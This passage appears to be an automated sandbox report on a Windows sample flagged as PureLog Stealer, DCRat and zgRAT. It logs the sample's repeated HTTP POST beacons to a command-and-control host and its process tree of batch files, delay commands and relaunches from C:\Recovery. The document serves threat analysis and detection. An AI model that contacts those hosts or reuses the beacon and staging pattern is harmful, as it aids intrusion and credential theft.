6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	62058	37.44.238.250	80	7968	C:\Recovery\axnJvpyQnMRKSw.exe

Timestamp	Bytes transferred	Direction	Data
Oct 30, 2024 22:33:06.308048964 CET	302	OUT	POST /EternalHttpprocessauthdbwordpressUploads.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 114936cm.nyashcrack.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Oct 30, 2024 22:33:06.656959057 CET	344	OUT	Data Raw: 05 07 04 0d 06 0c 04 01 05 06 02 01 02 04 01 0a 00 00 05 01 02 05 03 0a 01 03 0d 0d 05 00 03 57 0a 07 06 0f 02 53 04 07 0c 0b 07 03 06 0b 02 03 06 01 0b 0f 0a 05 05 01 01 0f 05 03 06 07 07 5f 02 03 0e 08 06 02 01 03 0f 0f 0c 04 0e 0d 0c 06 04 02 Data Ascii: WS_R\L~hcyZcqqaoU~lX]to\|Os^JoRx_z`z\|np`gpOie~V@@zmz}by
Oct 30, 2024 22:33:07.124568939 CET	25	IN	HTTP/1.1 100 Continue
Oct 30, 2024 22:33:07.191304922 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 30 Oct 2024 21:33:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	62111	37.44.238.250	80	2844	C:\Recovery\axnJvpyQnMRKSw.exe

Timestamp	Bytes transferred	Direction	Data
Oct 30, 2024 22:33:15.783632040 CET	290	OUT	POST /EternalHttpprocessauthdbwordpressUploads.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 114936cm.nyashcrack.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Oct 30, 2024 22:33:16.140556097 CET	344	OUT	Data Raw: 00 07 04 06 03 0a 01 01 05 06 02 01 02 06 01 04 00 0a 05 01 02 05 03 00 03 02 0f 53 04 50 00 04 0e 56 06 0c 02 07 03 07 0d 06 07 04 00 07 07 06 05 03 0d 08 0a 01 05 04 07 02 07 54 06 57 07 0e 05 06 0f 0c 00 00 05 02 0c 52 0d 00 0f 53 0b 09 02 02 Data Ascii: SPVTWRSYQ\L~\|s}ZcbrYb\p\|lvY`l`s^KylR[{Y}_km`tI^~e~V@B{C\}bW
Oct 30, 2024 22:33:16.597769022 CET	25	IN	HTTP/1.1 100 Continue
Oct 30, 2024 22:33:16.668473959 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 30 Oct 2024 21:33:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	62167	37.44.238.250	80	5376	C:\Recovery\axnJvpyQnMRKSw.exe

Timestamp	Bytes transferred	Direction	Data
Oct 30, 2024 22:33:26.527657986 CET	302	OUT	POST /EternalHttpprocessauthdbwordpressUploads.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 114936cm.nyashcrack.top Content-Length: 336 Expect: 100-continue Connection: Keep-Alive
Oct 30, 2024 22:33:26.875364065 CET	336	OUT	Data Raw: 00 00 04 07 06 01 04 02 05 06 02 01 02 05 01 0b 00 04 05 0d 02 00 03 0d 03 00 0c 04 07 07 01 07 0d 01 04 0e 01 05 03 01 0e 00 04 03 04 03 07 51 04 07 0b 09 0e 03 04 00 01 03 06 06 01 03 07 5c 02 00 0d 0a 04 56 01 04 0d 05 0c 0e 0f 01 0b 05 06 54 Data Ascii: Q\VTWQ\L~y^tLyv[`\|BvY`B{^hcsY{BQo^}^h}Z`^\~_~V@{Cb~ey
Oct 30, 2024 22:33:27.352427959 CET	25	IN	HTTP/1.1 100 Continue
Oct 30, 2024 22:33:27.417965889 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 30 Oct 2024 21:33:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	62218	37.44.238.250	80	7600	C:\Recovery\axnJvpyQnMRKSw.exe

Timestamp	Bytes transferred	Direction	Data
Oct 30, 2024 22:33:36.447777987 CET	338	OUT	POST /EternalHttpprocessauthdbwordpressUploads.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 114936cm.nyashcrack.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Oct 30, 2024 22:33:36.797122002 CET	344	OUT	Data Raw: 05 02 04 00 03 08 01 0b 05 06 02 01 02 03 01 00 00 0a 05 08 02 07 03 0f 03 0f 0d 04 06 50 03 55 0d 0e 04 0b 03 03 06 05 0f 00 07 54 00 04 04 07 04 07 0d 00 0c 00 06 07 07 0e 07 07 06 50 06 0a 00 57 0d 0b 00 05 06 03 0c 01 0f 05 0a 03 0f 09 07 07 Data Ascii: PUTPW]XVPV\L}Rkci^tLz_aKcTklSwlhLMtDolQHo^P\|CZcthAe~V@xC\A}LS
Oct 30, 2024 22:33:37.274219036 CET	25	IN	HTTP/1.1 100 Continue
Oct 30, 2024 22:33:37.342293024 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 30 Oct 2024 21:33:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.4	62263	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Oct 30, 2024 22:33:45.077727079 CET	302	OUT	POST /EternalHttpprocessauthdbwordpressUploads.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 114936cm.nyashcrack.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Oct 30, 2024 22:33:45.437485933 CET	344	OUT	Data Raw: 05 00 01 00 03 0d 01 03 05 06 02 01 02 06 01 01 00 03 05 01 02 03 03 0e 00 05 0f 03 05 05 00 01 0f 03 07 09 02 02 04 52 0e 06 05 56 06 04 07 04 03 05 0c 5a 0a 03 05 0b 05 04 03 05 06 0a 06 00 02 06 0f 01 07 52 04 04 0c 57 0c 52 0a 03 0c 03 04 0d Data Ascii: RVZRWRRW\L~C~pe_w~Ybu\|BBitRlOpyll^{NfI\|mR`^o[}u~V@BxSv~Li
Oct 30, 2024 22:33:45.890553951 CET	25	IN	HTTP/1.1 100 Continue
Oct 30, 2024 22:33:45.952507973 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 30 Oct 2024 21:33:44 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.4	62276	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Oct 30, 2024 22:33:58.659898996 CET	355	OUT	POST /EternalHttpprocessauthdbwordpressUploads.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 114936cm.nyashcrack.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Oct 30, 2024 22:33:59.015465975 CET	344	OUT	Data Raw: 00 07 04 01 06 0d 04 05 05 06 02 01 02 03 01 0a 00 00 05 00 02 03 03 0a 02 00 0f 50 06 0f 03 50 0d 00 06 0e 00 57 04 06 0e 56 07 00 05 0b 06 04 04 07 0b 01 0a 06 04 00 05 07 05 05 06 07 05 01 03 03 0c 0f 06 02 05 02 0c 50 0c 04 0f 02 0d 01 05 0d Data Ascii: PPWVPS\WUU\L}T\|`u^`b\Xvf`@\|BSBv\|hMhc]_xRl^ocaYkmhtIcZ~u~V@zmz~Ly
Oct 30, 2024 22:33:59.463896990 CET	25	IN	HTTP/1.1 100 Continue
Oct 30, 2024 22:33:59.526715040 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 30 Oct 2024 21:33:57 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Target ID:	0
Start time:	17:31:53
Start date:	30/10/2024
Path:	C:\Users\user\Desktop\FuWRu2Mg82.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\FuWRu2Mg82.exe"
Imagebase:	0x220000
File size:	3'666'432 bytes
MD5 hash:	6C5F6433BAE4CBF3DC2D1FD40B716B08
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1653544673.0000000000222000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1708412433.0000000012D13000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	17:31:57
Start date:	30/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\0jztGmSOAj.bat"
Imagebase:	0x7ff68f430000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	17:31:57
Start date:	30/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	17:31:57
Start date:	30/10/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff778fb0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	17:31:57
Start date:	30/10/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff790450000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	17:32:06
Start date:	30/10/2024
Path:	C:\Recovery\axnJvpyQnMRKSw.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\axnJvpyQnMRKSw.exe"
Imagebase:	0x640000
File size:	3'666'432 bytes
MD5 hash:	6C5F6433BAE4CBF3DC2D1FD40B716B08
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\axnJvpyQnMRKSw.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\axnJvpyQnMRKSw.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 71%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	17:32:13
Start date:	30/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\O2a76Ow1QW.bat"
Imagebase:	0x7ff68f430000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	17:32:14
Start date:	30/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	17:32:14
Start date:	30/10/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff778fb0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	17:32:14
Start date:	30/10/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff6a2db0000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	17:32:19
Start date:	30/10/2024
Path:	C:\Recovery\axnJvpyQnMRKSw.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\axnJvpyQnMRKSw.exe"
Imagebase:	0x990000
File size:	3'666'432 bytes
MD5 hash:	6C5F6433BAE4CBF3DC2D1FD40B716B08
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	17:32:24
Start date:	30/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6KfhU02lmW.bat"
Imagebase:	0x7ff68f430000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	17:32:24
Start date:	30/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	17:32:24
Start date:	30/10/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff778fb0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	17:32:24
Start date:	30/10/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff6a2db0000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	17:32:29
Start date:	30/10/2024
Path:	C:\Recovery\axnJvpyQnMRKSw.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\axnJvpyQnMRKSw.exe"
Imagebase:	0xfb0000
File size:	3'666'432 bytes
MD5 hash:	6C5F6433BAE4CBF3DC2D1FD40B716B08
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	17:32:33
Start date:	30/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\dYHSyFVcIa.bat"
Imagebase:	0x7ff68f430000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	17:32:33
Start date:	30/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	17:32:33
Start date:	30/10/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff778fb0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	17:32:33
Start date:	30/10/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff6a2db0000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	17:32:38
Start date:	30/10/2024
Path:	C:\Recovery\axnJvpyQnMRKSw.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\axnJvpyQnMRKSw.exe"
Imagebase:	0x140000
File size:	3'666'432 bytes
MD5 hash:	6C5F6433BAE4CBF3DC2D1FD40B716B08
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	17:32:42
Start date:	30/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\k9Xkw6Am4N.bat"
Imagebase:	0x7ff72bec0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	17:32:42
Start date:	30/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	17:32:42
Start date:	30/10/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff778fb0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	17:32:43
Start date:	30/10/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff790450000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	17:32:52
Start date:	30/10/2024
Path:	C:\Recovery\axnJvpyQnMRKSw.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\axnJvpyQnMRKSw.exe"
Imagebase:	0xd80000
File size:	3'666'432 bytes
MD5 hash:	6C5F6433BAE4CBF3DC2D1FD40B716B08
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	17:32:56
Start date:	30/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\RHLnW0oZVx.bat"
Imagebase:	0x7ff68f430000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	17:32:56
Start date:	30/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	17:32:56
Start date:	30/10/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff778fb0000
